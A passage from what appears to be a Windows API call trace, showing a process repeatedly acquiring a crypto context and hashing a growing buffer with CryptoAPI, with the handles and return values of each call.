Flags=0x8, Size=0x20) returned 0x32e6d950 [0179.378] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d950, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d950, pdwDataLen=0xcdf6c) returned 1 [0179.378] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.378] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.378] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.379] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.379] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x400, dwFlags=0x0) returned 1 [0179.379] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.379] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d1d0 [0179.379] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d1d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d1d0, pdwDataLen=0xcdf6c) returned 1 [0179.379] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.379] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.379] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.380] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.380] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x420, dwFlags=0x0) returned 1 [0179.380] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.380] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d5f0 [0179.380] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d5f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d5f0, pdwDataLen=0xcdf6c) returned 1 [0179.380] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.380] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.380] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0179.381] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.381] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x440, dwFlags=0x0) returned 1 [0179.381] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.381] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d800 [0179.381] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d800, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d800, pdwDataLen=0xcdf6c) returned 1 [0179.381] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.381] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0179.381] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.382] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.382] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x460, dwFlags=0x0) returned 1 [0179.382] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.382] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d200 [0179.382] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d200, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d200, pdwDataLen=0xcdf6c) returned 1 [0179.382] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.382] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.382] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.383] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.383] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x480, dwFlags=0x0) returned 1 [0179.383] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.383] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6da10 [0179.383] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6da10, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6da10, pdwDataLen=0xcdf6c) returned 1 [0179.383] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.383] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.383] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.384] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.384] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0179.384] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.384] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d770 [0179.384] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d770, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d770, pdwDataLen=0xcdf6c) returned 1 [0179.384] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.384] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.384] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.385] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.385] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0179.385] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d350 [0179.385] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d350, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d350, pdwDataLen=0xcdf6c) returned 1 [0179.385] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.385] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.385] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0179.387] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.387] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0179.387] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.387] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d890 [0179.387] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d890, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d890, pdwDataLen=0xcdf6c) returned 1 [0179.387] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.387] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0179.387] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0179.388] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.388] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x500, dwFlags=0x0) returned 1 [0179.388] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.388] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cff0 [0179.388] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cff0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cff0, pdwDataLen=0xcdf6c) returned 1 [0179.388] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.388] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0179.388] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.389] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.389] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x520, dwFlags=0x0) returned 1 [0179.389] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.389] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf60 [0179.389] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6cf60, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cf60, pdwDataLen=0xcdf6c) returned 1 [0179.389] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.389] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.389] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.390] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.390] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x540, dwFlags=0x0) returned 1 [0179.390] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d440 [0179.390] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d440, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d440, pdwDataLen=0xcdf6c) returned 1 [0179.390] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.390] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.390] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0179.391] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.391] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x560, dwFlags=0x0) returned 1 [0179.391] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.391] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d320 [0179.391] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d320, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d320, pdwDataLen=0xcdf6c) returned 1 [0179.391] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.391] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0179.391] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.392] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.392] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x580, dwFlags=0x0) returned 1 [0179.392] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.392] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d110 [0179.392] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d110, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d110, pdwDataLen=0xcdf6c) returned 1 [0179.392] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.392] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.392] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.393] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.393] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0179.393] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.393] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d920 [0179.393] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d920, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d920, pdwDataLen=0xcdf6c) returned 1 [0179.393] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.393] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.393] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.394] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.394] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0179.394] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d8c0 [0179.394] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d8c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d8c0, pdwDataLen=0xcdf6c) returned 1 [0179.394] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.394] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.394] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.395] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.395] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0179.395] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.395] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d080 [0179.395] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d080, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d080, pdwDataLen=0xcdf6c) returned 1 [0179.395] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.395] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.395] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.396] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.396] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x600, dwFlags=0x0) returned 1 [0179.396] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.396] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d650 [0179.396] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d650, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d650, pdwDataLen=0xcdf6c) returned 1 [0179.396] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.396] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.396] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.397] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.397] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x620, dwFlags=0x0) returned 1 [0179.397] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.397] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d8f0 [0179.397] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d8f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d8f0, pdwDataLen=0xcdf6c) returned 1 [0179.397] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.397] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.397] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.398] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.398] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x640, dwFlags=0x0) returned 1 [0179.398] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.398] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d0e0 [0179.398] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d0e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d0e0, pdwDataLen=0xcdf6c) returned 1 [0179.398] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.398] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.398] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.398] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.398] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x660, dwFlags=0x0) returned 1 [0179.399] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.399] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d050 [0179.399] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d050, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d050, pdwDataLen=0xcdf6c) returned 1 [0179.399] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.399] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.399] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.399] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.399] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x680, dwFlags=0x0) returned 1 [0179.400] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d710 [0179.400] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d710, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d710, pdwDataLen=0xcdf6c) returned 1 [0179.400] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.400] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.400] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.400] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.400] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0179.400] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d9e0 [0179.401] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d9e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d9e0, pdwDataLen=0xcdf6c) returned 1 [0179.401] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.401] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.401] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0179.408] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.408] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0179.408] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.408] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d500 [0179.408] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d500, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d500, pdwDataLen=0xcdf6c) returned 1 [0179.408] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.408] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0179.408] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.409] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.409] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0179.409] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.409] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d0b0 [0179.409] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d0b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d0b0, pdwDataLen=0xcdf6c) returned 1 [0179.409] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.409] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.409] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.410] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.410] CryptHashData 